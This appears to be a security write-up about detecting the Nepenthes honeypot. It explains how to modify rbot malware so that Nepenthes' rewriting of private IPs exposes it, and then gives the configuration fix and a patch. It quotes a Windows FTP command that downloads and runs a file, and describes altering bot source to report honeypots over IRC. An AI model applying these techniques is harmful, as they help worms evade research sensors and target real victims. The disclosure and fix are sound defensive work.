No false positives: using the local IP replacement
There are many ways to detect a running nepenthes remotely.
However, nepenthes simulates a vulnerable computer...
We will try to find a way to detect nepenthes by simulating a worm.
First we have to get malware source code.
We will use a simple rbot and a very common exploit (like asn1)
to create a "Nepenthes Detection Bot".
We have to find something unique in the behaviour of nepenthes.
That's easy.
Nepenthes replaces private IPs found in shell commands.
We have to replace the original line with a non-working command like "cmd /c echo open 172.16.1.210 %d >> bb&echo user 1 1 >> bb&echo get %s >> bb &echo quit >> bb &ftp -n -s:bb &del bb &%s \r\n",
ftpport, filename, filename);
.. an rbot like this would never be able to spread.
But nepenthes will replace the local IP and try to download the malware.
We are now going to comment out the file transfer in the bot's ftpd.cpp
and insert a notification like sprintf(sendbuf,"Found Nepenthes at %s", tmpip);
sent to IRCLINE.
Don't forget to close the data socket ;)
This issue could get your nepenthes honeypot blacklisted,
targeted by an automated distributed Denial of Service attack,
or just let the worm choose only real victims and then send the file.
You should change the nepenthes.conf:
downloadmanager
{
replace_local_ips "0";
};
and visit the Nepenthes Homepage
I have to thank them for posting it.
Nasty: using (ulAddress == 0)
It's a good idea to disable local IP replacement.
However, it does not affect downloads containing "0.0.0.0".
This sets ulAddress to 0, which makes bReplaceHost TRUE.
Replacement would be done and the download wouldn't get deleted.
-> Detection succeeds
Solution:
Get the official diff file and live with some strange behaviours,
or try my DownloadManager.cpp.
I think it's working now without introducing a new problem. dm.tar.gz
HINT: ignorance is futile. issue got fixed in nepenthes version 0.2.2
All patches and files are for educational purposes only.
They are mostly tested, but nobody is perfect ;).
We will not instruct you how to patch or overwrite.